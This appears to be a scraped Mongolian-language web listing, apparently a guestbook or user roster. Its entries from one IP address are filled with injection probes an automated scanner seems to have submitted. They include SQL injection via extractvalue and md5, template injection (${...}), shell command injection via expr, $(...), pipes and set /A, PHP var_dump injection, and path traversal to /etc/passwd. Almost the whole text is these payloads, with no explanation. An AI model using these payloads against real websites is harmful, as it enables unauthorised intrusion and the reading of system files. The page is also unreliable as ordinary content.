 • extractvalue(1,concat(char(126),md5(1053624985))) 194.163.191.42 592 өдөр

  123456
 • ${957681977+939209305} 194.163.191.42 592 өдөр

  123456
 • expr 973805835 + 981372976 194.163.191.42 592 өдөр

  123456
 • admin"and/**/extractvalue(1,concat(char(126),md5(1610868304)))and" 194.163.191.42 592 өдөр

  123456
 • ./../../../../../../../../../../../../../../../../../../etc/passwd 194.163.191.42 592 өдөр

  123456
 • admin&set /A 899614922+971729594 194.163.191.42 592 өдөр

  123456
 • '-var_dump(md5(959416198))-' 194.163.191.42 592 өдөр

  123456
 • admin$(expr 850416013 + 858721006) 194.163.191.42 592 өдөр

  123456
 • admin 194.163.191.42 592 өдөр

  ${842519660+865459925}
 • ${@var_dump(md5(270396142))}; 194.163.191.42 592 өдөр

  123456
 • qvfldbcvbbspndmpprez 194.163.191.42 592 өдөр

  123456
 • admin'and/**/extractvalue(1,concat(char(126),md5(1261683687)))and' 194.163.191.42 592 өдөр

  123456
 • admin 194.163.191.42 592 өдөр

  '-var_dump(md5(159698455))-'
 • admin|expr 830631687 + 934935515 194.163.191.42 592 өдөр

  123456
 • admin 194.163.191.42 592 өдөр

  qvfldbcvbbspndmpprez
 • admin 194.163.191.42 592 өдөр

  ${@var_dump(md5(882262023))};
 • admin 194.163.191.42 592 өдөр

  123456
 • ../../../../../../../../../../../../../../../../../../etc/passwdadmin 194.163.191.42 592 өдөр

  123456
 • admin expr 975029603 + 899732747 194.163.191.42 592 өдөр

  123456
 • admin 194.163.191.42 592 өдөр

  123456
 • admin 194.163.191.42 592 өдөр

  123456
 • ../../../../../../../../../../../../../../../../../../etc/passwd 194.163.191.42 592 өдөр

  123456
 • admin 194.163.191.42 592 өдөр

  123456
 • admin 194.163.191.42 592 өдөр

  123456